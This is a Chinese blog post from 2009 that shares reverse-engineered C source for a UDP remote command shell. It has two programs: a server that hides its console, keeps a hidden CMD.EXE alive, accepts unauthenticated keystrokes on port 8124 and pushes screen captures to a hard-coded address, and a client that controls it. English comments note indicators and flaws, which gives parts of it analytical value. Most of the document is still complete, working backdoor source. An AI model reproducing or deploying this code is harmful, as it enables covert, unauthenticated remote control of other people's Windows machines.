同步SHELL逆向源码
2009-02-20 23:25

保存在这里免得冒得了,07年末的,至今逆向能力不见增长,人变懒了

/*
*   www.lovemfc.com
*-----------------
*    pack.h
* 数据包
*------------------   
*/

/* packType values carried in HEAD.packType. Direction is taken from the
 * code below: KEY_SREEN is only ever sent by the server (SendSreenBuffer),
 * the other three only by the client (SendKeyInfo / HandlerRoutine). */
#define KEY_SREEN   0x1002   // payload: one CONSOLE_BUFFER screen snapshot (server -> client)
#define KEY_NO_CTRL   0x1003 // payload: one INPUT_RECORD keystroke (client -> server)
#define KEY_CTRL_C   0x1004  // Ctrl+C request, sent with a 0-byte payload
#define KEY_CTRL_BRAK 0x1005 // Ctrl+Break request, sent with a 0-byte payload


/* Fixed 16-byte header that prefixes every datagram in both directions.
 * Detection note: the magic 0x12345678 is written by both senders but is never
 * checked by either receiver (RecvKeyInfo looks only at packType, RecvSreen at
 * packType and SreenBufferSize). */
typedef struct head{
DWORD packHead;   // magic; both senders store 0x12345678 here
DWORD packType; // one of KEY_SREEN / KEY_NO_CTRL / KEY_CTRL_C / KEY_CTRL_BRAK (0x1002..0x1005)
DWORD SreenBufferSize; // payload length as passed by the sender: sizeof(CONSOLE_BUFFER), sizeof(INPUT_RECORD) or 0 for ctrl events
DWORD var_10004; // name not recovered from the binary; the server stores 0, the client never assigns it
}HEAD;
// 16 bytes

/* Client -> server datagram: header followed by one console input record.
 * Built by SendKeyInfo, replayed by RecvKeyInfo via WriteConsoleInput. */
typedef struct key_info{
HEAD packhead;
INPUT_RECORD Key; // 20 bytes per the original annotation; sent whole, key-up and key-down alike
}KEY_INFO;

/* Screen snapshot payload of a KEY_SREEN datagram.
 * With the member sizes given here (4+4+4+22+8000+2*8001) the struct is
 * 24036 bytes, which is exactly the SreenBufferSize value RecvSreen insists on. */
typedef struct console_buffer{   
UINT wCodePageID; // GetConsoleOutputCP() on the server, applied via SetConsoleOutputCP() on the client
DWORD Unkown1;   // always transmitted as 0; purpose not recovered
DWORD Unkown2; // always transmitted as 0; purpose not recovered
CONSOLE_SCREEN_BUFFER_INFO csb; // 22 bytes; the client replays dwSize and dwCursorPosition from it
UCHAR Character[8000]; // 80x100 cells read with ReadConsoleOutputCharacter from (0,0)
WORD Attribute[8001]; // cell attributes read with ReadConsoleOutputAttribute; only the first 8000 are ever filled
}CONSOLE_BUFFER;

/* Server -> client datagram: header plus the full screen snapshot.
 * Sent as one UDP datagram by SendSreenBuffer (16 + 24036 bytes with the
 * layout above), on every poll of RecvKeyInfo, whether or not the screen changed. */
typedef struct sreen_info{
HEAD packhead; // 16 bytes
CONSOLE_BUFFER consoleBuffer;
}SREEN_INFO;

----------------------------------------------------------------------------------------------------------------------------------

/*
*   www.lovemfc.com
*-----------------
* SERVER.CPP
* 服务端,RemoteCMDS.exe 的逆向源码
*------------------   
*/

#define _WIN32_WINNT 0x0500

#include <winsock2.h>
#include "pack.h"
#pragma comment (lib,"ws2_32.lib")


BOOL WINAPI HandlerRoutine(DWORD dwCtrlType); // console ctrl handler: swallows Ctrl+C / Ctrl+Break for this process
BOOL RecvKeyInfo();                           // one poll: replay a received keystroke, then push a screen snapshot
void SendSreenBuffer( int type , CONSOLE_BUFFER *buffer , int u_size); // wrap a snapshot in SREEN_INFO and sendto the hard-coded peer


SOCKET   hsocket = 0;      // UDP socket; bound to INADDR_ANY:8124 in WinMain, non-blocking
DWORD cout = 0;            // tick count recorded by RecvKeyInfo's default case (a timestamp, not an iostream)
HANDLE hConsoleOutput = 0; // hidden console screen buffer that the spawned CMD.EXE writes into

/*
 * Entry point of the server side (RemoteCMDS.exe).
 * Observable behaviour, in program order: single-instance mutex "RemoteCMDS";
 * non-blocking UDP socket bound to every interface on port 8124; a console that is
 * allocated and immediately hidden; a private 80x100 screen buffer; then an endless
 * loop that keeps a hidden CMD.EXE alive and calls RecvKeyInfo roughly every 100 ms.
 * The mutex name, the listening port, the hidden console and the MessageBox strings
 * on the failure paths are the host-side indicators this listing provides.
 * None of the four WinMain parameters is used. Every return path yields 0.
 */
int APIENTRY WinMain(HINSTANCE hInstance,
                     HINSTANCE hPrevInstance,
                     LPSTR     lpCmdLine,
                     int       nCmdShow)
{
WSADATA lpWsaData;

struct sockaddr_in bindSockaddr;

SECURITY_ATTRIBUTES safe_attrib;

STARTUPINFO lpStartupInfo;

PROCESS_INFORMATION lpProcessInformation;


u_long argit;

u_short UdpPort;


COORD dwSize;

// Single-instance guard. Only ERROR_ALREADY_EXISTS is checked; a NULL handle
// from any other CreateMutex failure is not handled.
HANDLE MutexClient = CreateMutex( NULL,FALSE,"RemoteCMDS" );
if (GetLastError()==ERROR_ALREADY_EXISTS)
{
    MessageBox( 0,"RemoteCMDS has running...",NULL,MB_OK );
    return 0;
}

// Winsock 1.1 is requested; failure paths below always undo what was set up so far.
if( WSAStartup( MAKEWORD(1,1), &lpWsaData ) )
{
    MessageBox( 0,"WSAStartup fail...",NULL,MB_OK );
    CloseHandle( MutexClient );
    return 0;
}


hsocket = socket( AF_INET, SOCK_DGRAM , 0);
if ( hsocket == INVALID_SOCKET )
{
    MessageBox( 0,"create socket handle fail...",NULL,MB_OK );
    CloseHandle( MutexClient );
    WSACleanup();
    return 0;
}

// FIONBIO = 1 puts the socket in non-blocking mode, so recvfrom in RecvKeyInfo
// returns immediately (SOCKET_ERROR) when no datagram is pending.
argit = 1;

if( ioctlsocket( hsocket , FIONBIO , &argit ) )
{
    MessageBox( 0,"ioctlsocket fail...",NULL,MB_OK );
    CloseHandle( MutexClient );
    closesocket( hsocket );
    WSACleanup();
    return 0;
}

UdpPort = htons(8124);

// Listens on 0.0.0.0:8124. Nothing later verifies the source address of a
// datagram, so every host that can reach this port is treated as the operator.
bindSockaddr.sin_family = AF_INET;
bindSockaddr.sin_port = UdpPort;
bindSockaddr.sin_addr.s_addr = INADDR_ANY;


if( SOCKET_ERROR == bind( hsocket ,(const struct sockaddr *)&bindSockaddr , sizeof(bindSockaddr) ) )
{
    MessageBox( 0,"Bind RemoteCMD port fail...",NULL,MB_OK );
    CloseHandle( MutexClient );
    closesocket( hsocket );
    WSACleanup();
    return 0;
}



// A console is needed for the child cmd.exe to attach to; its window is hidden
// right away, so the process has no visible UI while running.
AllocConsole();


ShowWindow( GetConsoleWindow(), SW_HIDE );


// HandlerRoutine returns TRUE for CTRL_C/CTRL_BREAK so the events that
// RecvKeyInfo raises with GenerateConsoleCtrlEvent do not end this process.
SetConsoleCtrlHandler( HandlerRoutine,TRUE );

safe_attrib.nLength = sizeof(SECURITY_ATTRIBUTES);
safe_attrib.lpSecurityDescriptor = NULL;
safe_attrib.bInheritHandle = TRUE; // the screen buffer handle is meant to reach the child as stdout/stderr

// Screen buffer the shell writes to and that RecvKeyInfo snapshots.
// Unlike the earlier failure paths this one reports nothing to the user.
hConsoleOutput = CreateConsoleScreenBuffer( GENERIC_READ|GENERIC_WRITE,
         FILE_SHARE_READ|FILE_SHARE_WRITE,
         &safe_attrib,
         CONSOLE_TEXTMODE_BUFFER,
         NULL);
if (hConsoleOutput == INVALID_HANDLE_VALUE)
{
    CloseHandle( MutexClient );
    closesocket( hsocket );
    WSACleanup();
    return 0;
}

// 80x100 = 8000 cells, matching the Character[8000] array in pack.h.
dwSize.X = 80 ;
dwSize.Y = 100;

SetConsoleScreenBufferSize( hConsoleOutput , dwSize );

SetConsoleActiveScreenBuffer( hConsoleOutput );


//GetStartupInfo (lpStartupInfo);
memset((void *)&lpStartupInfo, 0, sizeof(STARTUPINFO));

// Child window hidden; stdout/stderr go to the private screen buffer, stdin is this
// process's own console input, which is where RecvKeyInfo injects keystrokes.
lpStartupInfo.cb = sizeof(STARTUPINFO);
lpStartupInfo.dwFlags = STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW;
lpStartupInfo.wShowWindow = SW_HIDE;
lpStartupInfo.hStdError = hConsoleOutput;
lpStartupInfo.hStdOutput = hConsoleOutput;
lpStartupInfo.hStdInput = GetStdHandle( STD_INPUT_HANDLE );

// Respawn loop: the shell is recreated every time it exits; there is no exit condition.
while (TRUE)
{

   // NOTE(review): bInheritHandles (5th argument) is 0 while STARTF_USESTDHANDLES is set,
   // so handing the console handles to the child relies on the shared console rather than
   // the handle table -- behaviour that differs across Windows versions; confirm on target.
   if(!CreateProcess(0 ,"CMD.EXE", 0 ,0 , 0 , 0 , 0 , 0 , &lpStartupInfo , &lpProcessInformation ) )
   {
     MessageBox( 0,"create shell fail",NULL,MB_OK );
     CloseHandle( MutexClient );
     CloseHandle( hConsoleOutput );
     closesocket( hsocket );
     WSACleanup();
     return 0;
   }

   // RecvKeyInfo returns TRUE on every path, so this loop only ends when cmd.exe
   // exits; the 100 ms wait doubles as the polling period for keystrokes and
   // screen pushes.
   while (RecvKeyInfo())
   {
    if( WAIT_TIMEOUT != WaitForSingleObject( lpProcessInformation.hProcess , 100 ) )
    {
     break;
    }
   }

   TerminateProcess( lpProcessInformation.hProcess ,0 );

   CloseHandle( lpProcessInformation.hProcess );
  
   CloseHandle( lpProcessInformation.hThread );
}
return 0;
}

/*
 * Console control handler of the server.
 * Returns TRUE for CTRL_C_EVENT and CTRL_BREAK_EVENT, i.e. "handled", so the
 * default handler that would terminate this process does not run. That matters
 * because RecvKeyInfo raises these events with GenerateConsoleCtrlEvent on process
 * group 0, which reaches every process attached to the console, this one included.
 * Any other event returns FALSE and is left to the default handling.
 */
BOOL WINAPI HandlerRoutine(
DWORD dwCtrlType
)
{
// decompiled body

switch( dwCtrlType)
{
case CTRL_C_EVENT:
   break;
case CTRL_BREAK_EVENT:
   break;
default:
   return FALSE;
}
return TRUE;
}


/*
 * One poll of the server loop: consume at most one datagram from the non-blocking
 * socket, act on it, then push a snapshot of the shell's screen to the peer.
 *
 * Returns TRUE on every path, so the caller's loop never stops because of it.
 *
 * Security notes for anyone assessing this binary:
 *  - The sender address (fromSockaddr) is received and then ignored, the magic in
 *    packHead is not checked, and there is no authentication of any kind: any host
 *    that can deliver a datagram to UDP/8124 can inject keystrokes into the shell.
 *  - recvfrom's return value is only tested for sign; the byte count is never
 *    compared with sizeof(KEY_INFO), so a short datagram leaves part of buffer.Key
 *    uninitialised and it is still written to the console input.
 */
BOOL RecvKeyInfo()
{
DWORD NumberOfCharsRead;
struct sockaddr fromSockaddr;
COORD dwReadCoord;
KEY_INFO buffer;
CONSOLE_BUFFER sendBuffer;

int fromlen = sizeof(fromSockaddr);

// Non-blocking: SOCKET_ERROR (no datagram pending) skips straight to the screen push.
if(0 <= recvfrom( hsocket, (PCHAR)(&buffer) , sizeof(KEY_INFO) , 0 , &fromSockaddr, &fromlen ) )
{
   switch( buffer.packhead.packType )
   {
   case KEY_NO_CTRL:
    // Replays the received INPUT_RECORD into this process's console input, which the
    // spawned cmd.exe uses as stdin.
    WriteConsoleInput( GetStdHandle(STD_INPUT_HANDLE) ,&buffer.Key , 1 , &NumberOfCharsRead );
    break;
   case KEY_CTRL_C:
    // Process group 0: delivered to every process sharing this console (cmd.exe and
    // this server); the server survives because HandlerRoutine reports it as handled.
    GenerateConsoleCtrlEvent( CTRL_C_EVENT , NULL );
    break;
   case KEY_CTRL_BRAK:
    GenerateConsoleCtrlEvent( CTRL_BREAK_EVENT , NULL);
    break;
   default:
    // Unknown packType. cout starts at 0 and is only assigned in the else branch,
    // so the else branch is reachable only within the first second of uptime (or
    // around tick wraparound); in practice an unknown packet returns here without
    // sending a screen update. Looks like a rate limiter that never arms -- verify
    // against the binary.
    if( ( GetTickCount() - cout) > 1000 )
    {
     return TRUE;
    }else{
     cout = GetTickCount();
    }
    break;
   }
}
GetLastError(); // result discarded; no effect
dwReadCoord.X = 0;
dwReadCoord.Y = 0;

// memset converts its value argument to unsigned char, so the fill byte is 0x20
// (space); the 0x20202020 is probably how a dword-wide fill was rendered -- verify.
memset(&sendBuffer.Character , 0x20202020 , 8000);

sendBuffer.wCodePageID = GetConsoleOutputCP();

// Snapshot of all 8000 cells starting at (0,0); return values are not checked and
// NumberOfCharsRead is simply overwritten by each call.
ReadConsoleOutputAttribute( hConsoleOutput ,(WORD *)&sendBuffer.Attribute , 8000 , dwReadCoord , &NumberOfCharsRead);

ReadConsoleOutputCharacter( hConsoleOutput , (PCHAR)&sendBuffer.Character , 8000 , dwReadCoord , &NumberOfCharsRead);

GetConsoleScreenBufferInfo ( hConsoleOutput , &sendBuffer.csb);

// Pushed on every poll regardless of whether anything changed; the client
// deduplicates on its side.
SendSreenBuffer( KEY_SREEN , &sendBuffer , sizeof(CONSOLE_BUFFER));

return TRUE;

}

/*
 * Wrap a screen snapshot in a SREEN_INFO datagram and send it to the hard-coded peer.
 *
 * type    -- packType to store in the header (the only caller passes KEY_SREEN).
 * buffer  -- snapshot to copy into the datagram.
 * u_size  -- bytes to copy from buffer; also reported as SreenBufferSize. It is not
 *            checked against sizeof(CONSOLE_BUFFER); the only caller passes exactly that.
 *
 * Network indicator: the destination 192.168.0.100:8123 is compiled in, so the
 * server pushes its screen to that fixed address no matter who sent the keystrokes.
 * Each call emits one UDP datagram of sizeof(SREEN_INFO) bytes (about 24 KB with the
 * pack.h layout) from source port 8124. The sendto result is ignored, so a drop on the
 * non-blocking socket goes unnoticed.
 */
void SendSreenBuffer( int type , CONSOLE_BUFFER *buffer , int u_size)
{
struct sockaddr_in to; // not zero-initialised; sin_zero is left as stack garbage
SREEN_INFO sendBuffer; // ~24 KB on the stack

memcpy( &sendBuffer.consoleBuffer , buffer , u_size);

sendBuffer.packhead.packHead = 0x12345678; // magic; never verified by the client
sendBuffer.packhead.packType = type;
sendBuffer.packhead.SreenBufferSize = u_size;
sendBuffer.packhead.var_10004   = NULL;
// Overwrites whatever memcpy brought in for the two unknown fields.
sendBuffer.consoleBuffer.Unkown1 = NULL;
sendBuffer.consoleBuffer.Unkown2 = NULL;

to.sin_port = htons(8123);
to.sin_family = AF_INET;
to.sin_addr.s_addr = inet_addr("192.168.0.100");
sendto( hsocket , (const char *)&sendBuffer ,sizeof(SREEN_INFO) , 0 , (const struct sockaddr *)&to , sizeof(to) );

}

----------------------------------------------------------------------------------------------------------------------------------

/*
*   www.lovemfc.com
*-----------------
*
* 客户端, RemoteCMD.exe 的逆向源码
*------------------   
*/


#include <winsock2.h>
#include "pack.h"
#pragma comment (lib,"ws2_32.lib")

BOOL WINAPI HandlerRoutine(   DWORD dwCtrlType );  // forwards Ctrl+C / Ctrl+Break to the server as ctrl packets
BOOL RecvSreen();                                   // one poll: accept a screen datagram and repaint the local console
BOOL KeyboardEvent( DWORD dwMilliseconds);          // wait for one console input record and forward key events
void SendKeyInfo( int type , PINPUT_RECORD buffer , int u_size); // wrap an INPUT_RECORD in KEY_INFO and sendto toSockaddr

// globals

SOCKET hsocket = 0; // UDP socket; bound to INADDR_ANY:8123 in main, non-blocking

HANDLE hConsoleOutput = 0; // local screen buffer that mirrors the remote shell's screen; never closed

COORD dwSize; // 80x100, set once in main

PINPUT_RECORD Ctrl_NULL; // never assigned (stays NULL); passed with u_size 0 for ctrl packets

// Filled by recvfrom in RecvSreen, i.e. the source of the last accepted screen packet,
// and used by SendKeyInfo as the destination for keystrokes. There is no address pinning,
// so whoever last delivered an acceptable KEY_SREEN datagram becomes the keystroke target.
struct sockaddr toSockaddr;

// Copy of the first 6000 bytes of the last displayed CONSOLE_BUFFER; RecvSreen skips
// the repaint when the incoming frame matches it.
UCHAR cmdBuffer[6001] = {0};


/*
 * Entry point of the client side (RemoteCMD.exe).
 * Mirrors the server's setup: single-instance mutex "RemoteCMD", non-blocking UDP
 * socket bound to every interface on port 8123, a window title naming the author,
 * an 80x100 screen buffer, then a loop alternating RecvSreen and KeyboardEvent(100).
 * Both loop functions return TRUE on every path, so the loop below never ends on its
 * own and the cleanup after it appears to be unreachable; the process presumably ends
 * through the console being closed (the hConsoleOutput handle is never closed anywhere).
 * `void main()` is the non-standard form the decompilation produced; kept as is.
 */
void main()
{
WSADATA lpWsaData;

u_short UdpPort;
u_long argit;

struct sockaddr_in bindSockaddr;

SECURITY_ATTRIBUTES safe_attrib;

// Single-instance guard; only ERROR_ALREADY_EXISTS is checked, a NULL handle is not.
HANDLE MutexClient = CreateMutex( NULL,FALSE,"RemoteCMD" );
if (GetLastError()==ERROR_ALREADY_EXISTS)
{
    MessageBox( 0,"RemoteCMD has running...",NULL,MB_OK );
    return;
}

if( WSAStartup( MAKEWORD(1,1), &lpWsaData ) )
{
    MessageBox( 0,"WSAStartup fail...",NULL,MB_OK );
    CloseHandle( MutexClient );
    return;
}

hsocket = socket( AF_INET, SOCK_DGRAM , 0);
if ( hsocket == INVALID_SOCKET )
{
    MessageBox( 0,"create socket handle fail...",NULL,MB_OK );
    CloseHandle( MutexClient );
    WSACleanup();
    return;
}
// Non-blocking, so recvfrom in RecvSreen returns SOCKET_ERROR when nothing is pending.
argit = 1;

if( ioctlsocket( hsocket , FIONBIO , &argit ) )
{
    MessageBox( 0,"ioctlsocket fail...",NULL,MB_OK );
    CloseHandle( MutexClient );
    closesocket( hsocket );
    WSACleanup();
    return;
}

// Listens on 0.0.0.0:8123, the port the server's SendSreenBuffer targets.
UdpPort = htons(8123);

bindSockaddr.sin_family = AF_INET;
bindSockaddr.sin_port = UdpPort;
bindSockaddr.sin_addr.s_addr = INADDR_ANY;


if( SOCKET_ERROR==bind( hsocket ,(const struct sockaddr *)&bindSockaddr , sizeof(bindSockaddr) ) )
{
    MessageBox( 0,"Bind RemoteCMD port fail...",NULL,MB_OK );
    CloseHandle( MutexClient );
    closesocket( hsocket );
    WSACleanup();
    return;
}

// Ctrl+C / Ctrl+Break in this window are turned into ctrl packets by HandlerRoutine.
SetConsoleCtrlHandler( HandlerRoutine,TRUE );

// Window title string: a literal worth noting as an identifying artifact of the client.
SetConsoleTitle("RemoteCMD V1.0 coder by lovemfc.cn QQ:343789385!");

safe_attrib.nLength = sizeof(SECURITY_ATTRIBUTES);
safe_attrib.lpSecurityDescriptor = NULL;
safe_attrib.bInheritHandle = TRUE;

hConsoleOutput = CreateConsoleScreenBuffer( GENERIC_READ|GENERIC_WRITE,
         FILE_SHARE_READ|FILE_SHARE_WRITE,
         &safe_attrib,
         CONSOLE_TEXTMODE_BUFFER,
         NULL);
if (hConsoleOutput == INVALID_HANDLE_VALUE)
{
    CloseHandle( MutexClient );
    closesocket( hsocket );
    WSACleanup();
    return;
}

// Same 80x100 geometry as the server, so the 8000-cell snapshots map 1:1.
dwSize.X = 80;
dwSize.Y = 100;

SetConsoleScreenBufferSize( hConsoleOutput , dwSize );

SetConsoleActiveScreenBuffer( hConsoleOutput );

// Main loop: repaint from the network, then wait up to 100 ms for local keyboard input.
while( RecvSreen() )
{
   if (!KeyboardEvent( 100 ) )
   {
    break;
   }
}

// Reached only if one of the loop functions ever returned FALSE, which none does.
SetConsoleCtrlHandler( HandlerRoutine , FALSE );

CloseHandle( MutexClient );

closesocket( hsocket );

WSACleanup();

return;
}

/*
 * One poll of the client loop: accept at most one KEY_SREEN datagram and repaint
 * the local console from it.
 *
 * Returns TRUE on every path.
 *
 * Acceptance checks, in order: at least 16 bytes received (SOCKET_ERROR and anything
 * shorter than HEAD are dropped), packType == KEY_SREEN, SreenBufferSize == 24036
 * (sizeof(CONSOLE_BUFFER) with the pack.h layout), and the first 6000 bytes of the
 * payload differ from the previously displayed frame.
 *
 * Security notes for anyone assessing this binary:
 *  - The received length is never compared with sizeof(SREEN_INFO), so a datagram of
 *    16 bytes with a matching header passes every check and the console is painted
 *    from uninitialised stack contents.
 *  - The sender of any accepted datagram is stored in the global toSockaddr and from
 *    then on receives the operator's keystrokes (see SendKeyInfo); there is no
 *    authentication or address pinning.
 *  - dwSize, dwCursorPosition and the code page are taken from the packet and passed
 *    straight to the console APIs.
 */
BOOL RecvSreen()
{
DWORD fromlen = sizeof(toSockaddr); // NOTE(review): recvfrom takes int*; same width on Win32, but a type mismatch
DWORD NumberOfcharsWriten;
COORD dwWriteCoord;
SREEN_INFO buffer; // ~24 KB on the stack, not zero-initialised

if( 16 > recvfrom( hsocket, (PCHAR)(&buffer) , sizeof(SREEN_INFO) , 0 , &toSockaddr, &fromlen ) )
{
   return TRUE;
}
if ( buffer.packhead.packType != KEY_SREEN)
{
   return TRUE;
}
if ( buffer.packhead.SreenBufferSize != 24036)
{
   return TRUE;
}
// Dedup: 6000 bytes from wCodePageID cover the code page, the two unknown fields,
// csb and the first 5966 character bytes; a frame that differs only in later
// characters or in attributes is not repainted.
if( !memcmp( &buffer.consoleBuffer.wCodePageID , &cmdBuffer , 6000) )
{
   return TRUE;
}

dwWriteCoord.X = 0;
dwWriteCoord.Y = 0;

// Repaint all 8000 cells from (0,0); return values are not checked.
WriteConsoleOutputAttribute( hConsoleOutput , (const WORD *)(&buffer.consoleBuffer.Attribute), 8000 , dwWriteCoord , &NumberOfcharsWriten);

WriteConsoleOutputCharacter( hConsoleOutput , (const char *)(&buffer.consoleBuffer.Character), 8000 , dwWriteCoord , &NumberOfcharsWriten);

// Peer-supplied geometry, cursor and code page applied without validation.
SetConsoleScreenBufferSize( hConsoleOutput , buffer.consoleBuffer.csb.dwSize );

SetConsoleCursorPosition( hConsoleOutput , buffer.consoleBuffer.csb.dwCursorPosition);

SetConsoleOutputCP( buffer.consoleBuffer.wCodePageID );
memcpy( &cmdBuffer , &buffer.consoleBuffer , 6000); // remember this frame for the dedup check (fits in cmdBuffer[6001])
return TRUE;
}

/*
 * Wait up to dwMilliseconds for console input, read one record and forward it if it
 * is a key event.
 *
 * dwMilliseconds -- timeout for WaitForSingleObject on the console input handle.
 *
 * Returns TRUE on every path; a ReadConsoleInput failure is silently ignored.
 * Only KEY_EVENT records are sent (mouse/window/focus events are dropped). bKeyDown is
 * not inspected, so key-up records travel to the server as well.
 */
BOOL KeyboardEvent( DWORD dwMilliseconds)
{
INPUT_RECORD Buffer;
DWORD NumberOfEventsRead;
HANDLE input;

input = GetStdHandle( STD_INPUT_HANDLE );

if( WAIT_OBJECT_0 == WaitForSingleObject( input , dwMilliseconds ) )
{
   if( ReadConsoleInput( input , &Buffer , 1 , &NumberOfEventsRead))
   {
    if ( Buffer.EventType == KEY_EVENT )
    {
     SendKeyInfo( KEY_NO_CTRL , &Buffer , sizeof(INPUT_RECORD) );
    }
   }
}
return TRUE;
}

/*
 * Wrap an INPUT_RECORD in a KEY_INFO datagram and send it to toSockaddr.
 *
 * type    -- packType for the header (KEY_NO_CTRL, KEY_CTRL_C or KEY_CTRL_BRAK).
 * buffer  -- record to copy; HandlerRoutine passes the never-assigned Ctrl_NULL (NULL).
 * u_size  -- bytes to copy and the SreenBufferSize value; 0 for ctrl packets. It is not
 *            checked against sizeof(INPUT_RECORD).
 *
 * Notes: var_10004 is never assigned, so four bytes of uninitialised stack go out in
 * every packet; memcpy with a NULL source and length 0 is technically undefined in C
 * even though no bytes move; the sendto result is ignored.
 */
void SendKeyInfo( int type , PINPUT_RECORD buffer , int u_size)
{
KEY_INFO key_send;
memcpy( &key_send.Key , buffer , u_size );
key_send.packhead.packType = type;
key_send.packhead.packHead = 0x12345678;
key_send.packhead.SreenBufferSize = u_size;
// Guard against sending before any screen packet has arrived: reads the first DWORD of
// sa_data, which for a sockaddr_in holds the port and the first two address bytes
// (an unaligned read, since sa_data starts at offset 2). Whoever last delivered an
// accepted screen packet in RecvSreen is the destination.
if( *(DWORD *)(toSockaddr.sa_data) !=0 )
{
   sendto( hsocket , (const char *)&key_send ,sizeof(KEY_INFO) , 0 , &toSockaddr , sizeof(toSockaddr) );
}
return;
}

/*
 * Console control handler of the client: Ctrl+C / Ctrl+Break typed into the client
 * window are forwarded to the server as KEY_CTRL_C / KEY_CTRL_BRAK packets.
 * CTRL_C_EVENT returns TRUE (handled). CTRL_BREAK_EVENT has no break and falls into
 * default, so it returns FALSE after sending and the default handler runs as well;
 * the `break;` after that return is unreachable. Whether the fall-through is a bug in
 * the original or a decompiler rendering cannot be told from this listing.
 */
BOOL WINAPI HandlerRoutine(
DWORD dwCtrlType
)
{
// decompiled body
switch(dwCtrlType)
{
case CTRL_C_EVENT:
   SendKeyInfo( KEY_CTRL_C , Ctrl_NULL , 0);
   break;
case CTRL_BREAK_EVENT:
   SendKeyInfo( KEY_CTRL_BRAK , Ctrl_NULL , 0);
   // falls through to default (no break)
default:
   return FALSE;
   break;
}
return TRUE;
}

